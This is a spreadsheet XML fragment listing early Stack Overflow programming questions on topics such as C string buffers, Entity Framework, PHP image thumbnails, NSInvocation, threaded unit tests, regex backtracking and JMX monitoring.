    <t xml:space="preserve">&lt;p&gt;I know that &lt;a href="http://en.wikipedia.org/wiki/Buffer_overflow" rel="nofollow"&gt;buffer overruns&lt;/a&gt; are one potential hazard to using C-style strings (char arrays).  If I know my data will fit in my buffer, is it okay to use them anyway?  Are there other drawbacks inherent to C-style strings that I need to be aware of?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Here's an example close to what I'm working on:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char buffer[1024];
char * line = NULL;
while ((line = fgets(fp)) != NULL) { // this won't compile, but that's not the issue
    // parse one line of command output here.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code is taking data from a FILE pointer that was created using a &lt;code&gt;popen("df")&lt;/code&gt; command.  I'm trying to run Linux commands and parse their output to get information about the operating system.  Is there anything wrong (or dangerous) with setting the buffer to some arbitrary size this way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Must I use all tables in an Entity Framework model?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building an Entity Framework model for a subset of the Pubs database from microsoft. I am only interested and publishers and books, not publishers and employees, but there is a foreign key constraint between the publishers and emoloyees tables. When I remove the employees entity from my model, the model won't validate because of the foreign key constraint.&lt;/p&gt;
&lt;p&gt;How do I create a model for a subset of a database when that subset links to other tabes with foreign key constraints?&lt;/p&gt;
&lt;p&gt;Because this is for a demo, I deleted the offending tables and constraints from the database, but this won't work in production.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Actionscript3 to JavaScript communication: best practices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a more abstract level then &lt;a href="http://stackoverflow.com/questions/299729/javascript-to-flash-communication"&gt;a previous question&lt;/a&gt;, in my experience there are 3 ways to call a javascript function on an html page from an embedded .swf using AS3: ExternalInterface, fscommand, and navigateToURL.&lt;/p&gt;
&lt;p&gt;Let's compare and contrast these methods (and maybe others I haven't listed) and talk about the pros and cons of each - right now, ExternalInterface &lt;em&gt;seems&lt;/em&gt; like the way to go in terms of flexibility, but is it right for all situations? Are there concrete benefits in terms of execution speed or anything like that? I'm curious - what do we think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UI Useability - Reordering and merging columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a little web-based utility for my brother who needs to merge columns in a CSV file. I know things like this surely exist somewhere, but a large part of this is that is a fun little exercise.&lt;/p&gt;
&lt;p&gt;Anyways, I'm trying to figure out the best/neatest way to present the part of the UI where he reorders the columns and chooses which columns get merged.&lt;/p&gt;
&lt;p&gt;The jQuery UI "selectable" interaction provides about 85% of what I need - the simple reordering of the columns - but I'm having a bit of a rough time with the merging. What I'm trying to do is make it so that "merged" columns become a nested list under a single item.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="columns"&amp;gt;
&amp;lt;li&amp;gt;Column 1&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Column 2&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would become:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="columns"&amp;gt;
&amp;lt;li&amp;gt;Column 1&amp;lt;ul class="merge"&amp;gt;&amp;lt;li&amp;gt;Column 2&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is proving to be a bit more of a pain than I anticipated, so I was wondering if anyone had any ideas for a better way to present the overall UI. I'm fairly comfortable in jQuery, so bonus points if it can be done in jQuery :D&lt;/p&gt;
&lt;p&gt;@dylanfm: This &lt;em&gt;isn't&lt;/em&gt; tabular data - it's just a list of column &lt;em&gt;names&lt;/em&gt;, but no actual data. Besides, the specific HTML element I use is hardly at the heart of what I'm asking.&lt;/p&gt;
&lt;p&gt;@smo: I like the simplicity of your idea, but the problem is that there are several &lt;em&gt;dozen&lt;/em&gt; different columns, so listing every column once per column would unfortunately be out of the question.&lt;/p&gt;
&lt;p&gt;@strager: That's pretty much exactly what I've been trying to do, it's just that particulars of making UI respond the way I want have been giving me problems. I'll give you the answer for now, and I guess it's back to the salt mines for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rhino Mocks: How to return conditonal result from a mock object method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to do something like the following but can't seem to get the syntax for the Do method quite right.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var sqr = new _mocks.CreateRenderer&amp;lt;ShapeRenderer&amp;gt;();
Expect.Call(sqr.CanRender(null)).IgnoreArguments().Do(x =&amp;gt;x.GetType() == typeof(Square)).Repeat.Any();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So basically, I would like to set up the sqr.CanRender() method to return true if the input is of type Square and false otherwise.&lt;/p&gt;
&lt;p&gt;Can someone help me out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PNG Transparency with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey having some trouble trying to maintain transparency on a png when i create a thumbnail from it, anyone any experience with this? any help would be great, here's what i am currently doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fileName= "../js/ajaxupload/tees/".$fileName;
list($width, $height) = getimagesize($fileName);
$newwidth = 257;
$newheight = 197;
$thumb = imagecreatetruecolor($newwidth, $newheight);
imagealphablending($thumb, true);
$source = imagecreatefrompng($fileName);
imagealphablending($source, true);
imagecopyresized($thumb, $source, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
imagesavealpha($thumb, true);
imagepng($thumb,$newFilename);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>asp.net CMS solution: best mechanism for storing the data in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've worked on a number of CMS systems using the .NET platform (the CMS management system is in ASP.NET, and the site which renders the content is both ASP.NET and PHP).&lt;/p&gt;
&lt;p&gt;I've traditionally stored the generated content in classes that serialize to XML, which is stored in MSSQL 2005/2008 in a varchar(max) field.  This has made it convenient structuarally for different consumers of the content to work with, and it can be bound to classes (for re-opening the CMS record and editing it, or for the consuming website).&lt;/p&gt;
&lt;p&gt;However, I've been wondering what type of storage mechanism is popular with other CMS shops, and if anyone likes or has serious issue with the approach I'm most familiar with.&lt;/p&gt;
&lt;p&gt;Good, bad, ugly?  What would you do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Serving contextual based ads on sites built entirely in Flash?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the status of adsense (or equivalent) being able to serve contextual based ads on sites built entirely in Flash?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make Eclipse prompt me for command line arguments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know I can configure command line arguments in the Run configuration but I want to run a java file multiple times with different command line arguments. It's a pain to change the Run Configuration every time.&lt;/p&gt;
&lt;p&gt;Is there a way I can make Eclipse prompt me for command line arguments every time I run the program?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSInvocation for Dummies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How exactly does &lt;code&gt;NSInvocation&lt;/code&gt; work? Is there a good introduction?&lt;/p&gt;
&lt;p&gt;Iâ€™m specifically having issues understanding how the following code (from &lt;em&gt;Cocoa Programming for Mac OS X, 3rd Edition&lt;/em&gt;) works, but then also be able to apply the concepts independently of the tutorial sample. The code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void)insertObject:(Person *)p inEmployeesAtIndex:(int)index
{
    NSLog(@"adding %@ to %@", p, employees);
    // Add inverse of this operation to undo stack
    NSUndoManager *undo = [self undoManager];
    [[undo prepareWithInvocationTarget:self] removeObjectFromEmployeesAtIndex:index];
    if (![undo isUndoing])
        [undo setActionName:@"Insert Person"];
    // Finally, add person to the array
    [employees insertObject:p atIndex:index];
}
- (void)removeObjectFromEmployeesAtIndex:(int)index
{
    Person *p = [employees objectAtIndex:index];
    NSLog(@"removing %@ from %@", p, employees);
    // Add inverse of this operation to undo stack
    NSUndoManager *undo = [self undoManager];
    [[undo prepareWithInvocationTarget:self] insertObject:p
                                       inEmployeesAtIndex:index];
    if (![undo isUndoing])
        [undo setActionName:@"Delete Person"];
    // Finally, remove person from array
    [employees removeObjectAtIndex:index];
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get what itâ€™s trying to do. (BTW, &lt;code&gt;employees&lt;/code&gt; is an &lt;code&gt;NSArray&lt;/code&gt; of a custom &lt;code&gt;Person&lt;/code&gt; class.)&lt;/p&gt;
&lt;p&gt;Being a .NET guy, I try to associate unfamiliar Obj-C and Cocoa concepts to roughly analogous .NET concepts. Is this similar to .NETâ€™s delegate concept, but untyped? &lt;/p&gt;
&lt;p&gt;This isnâ€™t 100% clear from the book, so Iâ€™m looking for something supplemental from real Cocoa/Obj-C experts, again with the goal that I understand the fundamental concept beneath the simple(-ish) example. I'm really looking to be able to independently apply the knowledge -- up until chapter 9, I was having no difficulty doing that. But now ...  &lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE 7 not displaying a simple JS Alert?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Try clicking on the "Print" button on the following page:
(link removed - consensus is that everything was working fine and the problem was my setup)
For debugging purposes, I've replaced a chunk of javascript with a simple alert("test"), and even that isn't showing up in IE7 for me.  It works totally fine in Safari, FF (Mac and PC) and IE6, but for some reason it's not working in IE7.  For your reference, the code in the button is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a onclick="makeNewWindow()" href="#"&amp;gt;&amp;lt;img src="/print.gif"/&amp;gt;&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the JS inside /newsletter/print.js is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function makeNewWindow() {
   alert("test");   
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone help me understand if there's a way around this, or if this has something to do with the fact that I'm running "IE7 Standalone" via Parallels on my Mac?  Any help is greatly appreciated.&lt;/p&gt;
&lt;p&gt;Thanks,
Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hierarchical table column in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any Java library that supports hierarchical column?&lt;/p&gt;
&lt;p&gt;For example (the first three row are columns) :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;------------------------------------------------
2008                                           |
------------------------------------------------
January               | February               |
------------------------------------------------
Week1 | Week2 | Week3 | Week 1 | Week2 | Week3 |
------------------------------------------------
10    | 20    | 14    | 12     | 15    | 3     |
------------------------------------------------
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is a good idea to enable jmx (lambda probe) on a production server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are experiencing some slowdowns on our web-app deployed on a Tomcat 5.5.17 running on a Sun VM 1.5.0_06-b05 and our hosting company doesn't gives enough data to find the problem.&lt;/p&gt;
&lt;p&gt;We are considering installing &lt;a href="http://www.lambdaprobe.org"&gt;lambda probe&lt;/a&gt; on the production server but it requires to enable jmx (com.sun.management.jmxremote) in order to obtain memory and cpu statistics.&lt;/p&gt;
&lt;p&gt;Does enabling jmx incur a serious performance penalty?&lt;/p&gt;
&lt;p&gt;If we enable jmx, are we opening any security flaw? Do i need to setup secure authentication if we are only enabling local acces to jmx?&lt;/p&gt;
&lt;p&gt;Is anyone using the same (tomcat + lambda probe) without problems on production?&lt;/p&gt;
&lt;h1&gt;UPDATE&lt;/h1&gt;
&lt;p&gt;Looking at the answers it seems that enabling JMX alone doesn't incur significant overhead to the VM. The extra work may come if the monitoring application attached to the VM, be it &lt;em&gt;jConsole&lt;/em&gt;, &lt;em&gt;lambda probe&lt;/em&gt; or any other, is polling with excessive dedication.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bad request when client call a webservice that also calls another webservice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a client application that calls a function1 on webservice1 on server1 in the local network. The webservice1 then calls another webservice2 on an remote server2.&lt;/p&gt;
&lt;p&gt;If open Internet Explorer on server1 and point it to the function1 on webservice1 and run the function, everything goes fine.&lt;/p&gt;
&lt;p&gt;But if I run it from the client computer I got "bad request", "protocolerror". All other webservice functions works fine from the client, only the function that itself call another function on another server got this error.&lt;/p&gt;
&lt;p&gt;Is there any security context I must handle that I dont know about or anything else you can guess from what I described?&lt;/p&gt;
&lt;p&gt;Client is winXP and win2003, server1 is a virtual 2003 server on a physical win2008 server.&lt;/p&gt;
&lt;p&gt;Google could not help me here, I could se other with same problems but no solution.&lt;/p&gt;
&lt;p&gt;When Im running in my developement setup (webservice1 and client on my computer, there are no problem)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your favorite Delphi open source functional testing tool?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm aware of &lt;a href="http://selenium.openqa.org/"&gt;Selenium&lt;/a&gt; which is a very good open source automated website testing tool.&lt;/p&gt;
&lt;p&gt;Is there any equivalent open source tool to provide functional testing for Win32 GUI Delphi Applications?&lt;/p&gt;
&lt;p&gt;After a quick Google I've found this one : &lt;a href="http://code.google.com/p/eft/"&gt;EFT&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So my question is what is your favourite functional testing tool and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SRV record lookup with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you type&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;nslookup -type=SRV _xmpp-server._tcp.gmail.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(or use the dig command in OSX) you get some SRV records relating to google chat&lt;/p&gt;
&lt;p&gt;I would like to replicate this functionality in PHP, does anyone have any good ideas how to do this?&lt;/p&gt;
&lt;p&gt;I would like to avoid using exec() as this does not return 100% standard responses across OSX/*NIX/WINDOWS&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does regex "[^&lt;]*&lt;\\?" exhibit exponential time when the text doesn't have a "&lt;"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using ICU 4.0 regex library, I find that the following regex is exhibiting exponential time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;actual: "[^&amp;lt;]*&amp;lt;\?"
C code: "[^&amp;lt;]*&amp;lt;\\?"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Aim: find "&amp;lt;?" where there is no other "&amp;lt;" before it&lt;/p&gt;
&lt;p&gt;When running this regex on plain text with no "&amp;lt;" characters at all it appears to take exponential time. If the text has at least a single "&amp;lt;" then it is quick. I don't understand why. &lt;/p&gt;
&lt;p&gt;Shouldn't the required match on "&amp;lt;?" prevent this from needing to backtrack? I would have thought that it would try to find the first "&amp;lt;" and then test the rest of the expression. If it can't find a "&amp;lt;" then it would give up because the pattern obviously can't match.&lt;/p&gt;
&lt;p&gt;Is this a bug in the ICU regex or is it expected?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I add an attribute to a function to prevent reentry?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At the moment, I have some functions which look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private bool inFunction1 = false;
public void function1()
{
    if (inFunction1) return;
    inFunction1 = true;
    // do stuff which might cause function1 to get called
    ...
    inFunction1 = false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to be able to declare them like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[NoReEntry]
public void function1()
{
    // do stuff which might cause function1 to get called
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an attribute I can add to a function to prevent reentry?  If not, how would I go about making one?  I've heard about AOP attributes that can be used to add code before and after function calls; would they be suitable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert std::string to lower case?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to convert a &lt;code&gt;std::string&lt;/code&gt; to lowercase. I am aware of the function &lt;code&gt;tolower()&lt;/code&gt;, however in the past I have had issues with this function and it is hardly ideal anyway as use with a string would require iterating over each character.&lt;/p&gt;
&lt;p&gt;Is there an alternative which works 100% of the time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET/IIS friendly in-memory antivirus scanning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a solution that would let me scan files on the fly. It would need to integrate nicely with either with IIS(6.0 or 7.0) or ASP.NET. I spent some time trying to find something on the Internet but unfortunately all I've found is a COM based solution that still forces me to save files on disk (&lt;a href="http://www.opswat.com/metascan.shtml" rel="nofollow"&gt;http://www.opswat.com/metascan.shtml&lt;/a&gt;)
Update:
The solution needs to be hosted internally. &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Pawel&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Something better than .ToArray() to force enumeration of LINQ output</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with LINQ to objects and have a function where in some cases I need to modify the underlying collection before calling &lt;code&gt;Aggregate(...)&lt;/code&gt; and then return it to its original state before the funciton returns the results of &lt;code&gt;Aggregate(...)&lt;/code&gt;. My current code looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool collectionModified = false;
if(collectionNeedsModification)
{
    modifyCollection();
    collectionModified = true;
}
var aggregationResult = from a in
                            (from b in collection
                             where b.SatisfysCondition)
                             .Aggregate(aggregationFunction)
                        select a.NeededValue;
if(collectionModified)
    modifyCollection();
return aggregationResult;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, as written, if I modify the collection, I will get the wrong result because I'm putting the collection back in its original state before &lt;code&gt;aggregationResult&lt;/code&gt; is enumerated and LINQ results are lazy-evaluated. My current solution is to use &lt;code&gt;.ToArray()&lt;/code&gt; on my LINQ query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var aggregationResult = (from a in
                            (from b in collection
                             where b.SatisfysCondition)
                             .Aggregate(aggregationFunction)
                         select a.NeededValue).ToArray();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The size of the resulting array will always be small (&amp;lt; 100 items) so memory / processing time is not a concern.  Is this the best way to handle my problem, or is there a better way to force the evaluation of a LINQ query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you internationalise text in the database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Having a fully internationalised application is a necessity if you want to sell worldwide.
In Java we're using resource bundles and that solves things for static text codeside.&lt;/p&gt;
&lt;p&gt;But what do you do about text that is stored in the database? Starting with static definitions, to user modifiable objects, ending with user entered data.&lt;/p&gt;
&lt;p&gt;Assuming you have a database used by users with different Locales - how do you handle this? How far do you internationalise? Where do you draw the line?
What workaround can keep users from receiving text in a language they don't understand?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I set the program name for sybase connections in jdbc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can do it in C, and I can do it in perl, but I don't see how to set the program name on sybase connections using jdbc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices for maintaining shared hosting websites with ASP.NET and SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been doing PHP/MySQL websites with shared hosting providers for the last couple years. The day-to-day process is basically:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;develop in Eclipse, one website per folder&lt;/li&gt;
&lt;li&gt;upload via FileZilla, one website per folder&lt;/li&gt;
&lt;li&gt;use PHPMyAdmin to create and manage your local and online databases and transfer data from one to another&lt;/li&gt;
&lt;li&gt;to backup the online database I do dump of the database tables into script and copy them locally&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;I now want to build websites with ASP.NET with SQL Server 2008&lt;/strong&gt; on shared hosting providers, and am trying to get into this new paradigm, hopefully some of you can give me some pointers based on your experience and tell me what I am not doing optimally:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I've installed both the Visual Web Developer 2008 Express as well as the full version of Visual Studio 2008, both seem to be full-featured tools for developing ASP.NET sites. &lt;strong&gt;In terms of websites at shared hosting providers, what can you do with the full version that you can't do with the express version?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;I use FileZilla to upload my sites, which seems to work fine. &lt;strong&gt;Do you use an external FTP program to upload your sites or do you use the "Publish" or "FTP Website" in the above IDEs?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;I installed SQL Server 2008 Management Studio and can now issue SQL commands to my online SQL Server database (although I strangely can't see my database in the list on the left, I can still access it, I assume this is some rights issue with my provider, www.domainbox.de, but this provider told me to use their online manager instead, which is called "ASP.NET Enterprise Manager" which is extremely simple but at least has a "Query Box" which allows me to send queries to my database.) &lt;strong&gt;Is this "ASP.NET Enterprise Manager" standard with ASP.NET hosters or is there something else that is better, e.g. where you could edit your data in the grid, etc.?&lt;/strong&gt; And I assume that with most providers you are able to manage your online SQL Server database with SQL Server Management Studio, is that correct? (I remember back in 2001 managing online SQL Server 2000 database at a shared hosting provider with Enterprise Manager and it would take literally 10 minutes for me to see my database on the left because it listed out the other 800 customer databases as well -- hopefully this has been solved by now).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How do you backup your data in your online database to local storage?&lt;/strong&gt; (currently I would have to write code that output my data to some other format, e.g. XML or SQL Script)&lt;/li&gt;
&lt;li&gt;And after you make a number of structural and data changes to your local database, &lt;strong&gt;how do you transfer those changes and the new data to your online database?&lt;/strong&gt; (I had to install SSMS Tools [&lt;a href="http://www.ssmstoolspack.com" rel="nofollow"&gt;http://www.ssmstoolspack.com&lt;/a&gt;] to be able to dump my data into a script so that I could get it back into my online database).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, although I've gotten most things to work, I feel like there must be better ways to go about this, better providers, better tools, etc. &lt;strong&gt;Would like to hear some "best practices" advice from anyone who works with ASP.NET, SQL Server and shared hosting.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to (simply) generate POST http request from java to do the file upload</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to upload files from java application/applet using POST http event.  I would like to avoid to use any library not included in SE, unless there is no other (feasible) option. &lt;br&gt;
So far I come up only with very simple solution. &lt;br&gt;
- Create String (Buffer) and fill it with compatible header (&lt;a href="http://www.ietf.org/rfc/rfc1867.txt" rel="nofollow"&gt;http://www.ietf.org/rfc/rfc1867.txt&lt;/a&gt;)&lt;br&gt;
- Open connection to server URL.openConnection() and write content of this file to OutputStream. &lt;br&gt;
I also need to manually convert binary file into POST event. &lt;br&gt;&lt;br&gt;
I hope there is some better, simpler way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When are API methods marked "deprecated" actually going to go away?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm code reviewing a change one of my co-workers just did, and he added a bunch of calls to Date.toMonth(), Date.toYear() and other deprecated Date methods.  All these methods were deprecated in JDK 1.1, but he insists that it's ok to use them because they haven't gone away yet (we're using JDK 1.5) and I'm saying they might go away any day now and he should use Calendar methods.  Has Sun actually said when these things are going away, or does "@deprecated" just mean you lose style points?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows domain changed cause sql2005 login fail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company change the domain from abc to xyz and now i can't log into my local sql2005 via Windows login nor sql login.&lt;/p&gt;
&lt;p&gt;both login gave me this error: An error has occured while establishing a connection to the server. blah blah blah...Sql server does not allow remote connection. Error:26  - Error locating Server/Instance specified.&lt;/p&gt;
&lt;p&gt;i check the server instance is running. i can understand the windows login fail but how can sql login fail as well? does anyone know how to fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I perform a Unit Test using threads?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;b&gt;Executive Summary:&lt;/b&gt; When assertion errors are thrown in the threads, the unit test doesn't die. This makes sense, since one thread shouldn't be allowed to crash another thread. The question is how do I either 1) make the whole test fail when the first of the helper threads crashes or 2) loop through and determine the state of each thread after they have all completed (see code below). One way of doing the latter is by having a per thread status variable, e.g., "boolean[] statuses" and have "statuses[i] == false" mean that the thread failed (this could be extended to capture more information). However, that is not what I want: I want it to fail just like any other unit test when the assertion errors are thrown. Is this even possible? Is it desirable?&lt;/p&gt;
&lt;p&gt;I got bored and I decided to spawn a bunch of threads in my unit test and then have them call a service method, just for the heck of it. The code looks approximately like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Thread[] threads = new Thread[MAX_THREADS];
for( int i = 0; i &amp;lt; threads.length; i++ ) {
    threads[i] = new Thread( new Runnable() {
        private final int ID = threadIdSequenceNumber++;
        public void run() {
            try {
                resultRefs[ID] = runTest( Integer.toString( ID ) ); // returns an object
            }
            catch( Throwable t ) { 
                // this code is EVIL - it catches even
                // Errors - don't copy it - more on this below
                final String message = "error testing thread with id =&amp;gt; "
                            + ID;
                logger.debug( message, t );
                throw new IllegalStateException( message, t ); 
                // need to wrap throwable in a 
                // run time exception so it will compile
            }
        }
    } );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After this, we will loop through the array of threads and start each one. After that we will wait for them all to finish. Finally, we will perform some checks on the result references.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for( Thread thread : threads )
    thread.start();
logger.debug( "waiting for threads to finish ..." );
boolean done = false;
while( !done ) {
    done = true;
    for( Thread thread : threads )
        if( thread.isAlive() )
            done = false;
}
for( int i = 0; i &amp;lt; resultRefs.length; i++ ) {
    assertTrue( "you've got the world messed, dawg!",
            myCondition(resultRefs[i]) );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the problem. Did you notice that nasty try-catch-throwable block? I just added that as a temporary hack so I could see what was going on. In runTest( String ) a few assertions are made, e.g., assertNotNull( null ), but since it is in a different thread, it doesn't cause the unit test to fail!!!!&lt;/p&gt;
&lt;p&gt;My guess is that we will need to somehow iterate over the threads array, check the status of each, and manually cause an assertion error if the thread terminated in a nasty way. What's the name of the method that gives this information (the stack trace of the dead thread).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't this generic interface stack work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch of generic interfaces and classes&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public interface IElement {
// omited
}
class Element implements IElement {
// omited
}
public interface IElementList&amp;lt;E extends IElement&amp;gt;  extends Iterable {
   public Iterator&amp;lt;E&amp;gt; iterator();
}
class ElementList implements IElementList&amp;lt;Element&amp;gt; {
    public Iterator&amp;lt;Element&amp;gt; iterator() {
       // omited
       }
}
public interface IElementListGroup&amp;lt;E extends IElementList&amp;lt;? extends IElement&amp;gt;&amp;gt; {
    public E getChosenElementList();
}
class ElementListGroup implements IElementListGroup&amp;lt;ElementList&amp;gt; {
    public ElementList getChosenElementList() {
    	// omited
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then a simple code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ElementListGroup group;
for(Element e : group.getChosenElementList())
{
 // omited
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the line with for keyword throwe a "cannot convert from element type Object to Element" compiler error.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash Media Server/PHP Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help finding resources that would help me or at least point me in the right direction in building a Flash media server/PHP application. I basically want to improve my current application by instead of progressive download using flash media server so that the videos will not only stream well but they can't be downloaded by the end user.&lt;/p&gt;
&lt;p&gt;What the current application does is show a login form on the homepage and then when logged in the user can then navigate the site by choosing videos from a particular video category or video uploaded by a specific user. All this is done with PHP. The video page uses progressive download to display the video after the video ID has been passed using PHP.&lt;/p&gt;
&lt;p&gt;I need to know how PHP and flash media server work together. Are there any resources out there where I can find a good application example (really simple) that demonstrates how PHP and flash media server can be used to stream videos dynamically such that PHP checks for the login, video ID, video channels, and video category information while the flash media server streams the video.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to expand the code window in VS.NET to maximum size?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Eclipse you can double-click on the tab of the code window and expand it to full size, e.g. if you will be working on just the code awhile and want maximum size on a smaller monitor, etc.&lt;/p&gt;
&lt;p&gt;Is there a way to expand the code window in Visual Studio.NET in one click (otherwise I have to collapse Toolbox, Solution Explorer, Properties, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to define true, false, unset state</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you have a situation where you need to know where a boolean value wasn't set (for example if that unset value should inherit from a parent value) the Java boolean primitive (and the equivalent in other languages) is clearly not adequate.&lt;/p&gt;
&lt;p&gt;What's the best practice to achieve this?  Define a new simple class that is capable of expressing all three states or use the Java Boolean class and use null to indicate the unset state?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do all WPF render transforms run in double-precision?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;WPF stores all its data in double precision. I just want to confirm that all transforms, etc., run in double precision. &lt;/p&gt;
